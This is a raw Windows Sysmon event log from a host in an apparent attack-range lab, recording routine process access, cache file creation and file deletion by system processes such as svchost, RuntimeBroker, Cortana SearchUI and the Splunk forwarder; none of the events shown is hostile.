12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.290{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].pngMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html2021-03-31 12:02:31.243 23542300x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].htmlMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html2021-03-31 12:02:31.243 11241100x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.243{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\container.dat2021-03-31 12:02:31.243 11241100x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-03-31 12:02:31.228 23542300x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt2021-03-31 12:02:31.228 11241100x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-03-31 12:02:31.228 23542300x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt2021-03-31 12:02:31.228 11241100x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-03-31 12:02:31.228 23542300x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.228{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt2021-03-31 12:02:31.228 11241100x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.134{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-03-31 12:02:31.134 23542300x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.134{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.134{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt2021-03-31 12:02:31.134 11241100x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.119{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-03-31 12:02:31.119 23542300x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.119{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.119{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt2021-03-31 12:02:31.119 23542300x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.103{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD6F5F7E953B45D48C6A55BDF1DF0678,SHA256=D114F44F003A6739BA071229A3A4C36330DD416584AB06AF7596F13B6DAECFB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.072{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD8596B390E508AB6331B9D92C006BE5,SHA256=AE3ED70DB2F7B79C7129A127DCA58B8E7019751F4DA0FB833D3983FD8BF788F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f830|C:\Windows\System32\execmodelclient.dll+1e079|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f8ac|C:\Windows\System32\execmodelclient.dll+1e05b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 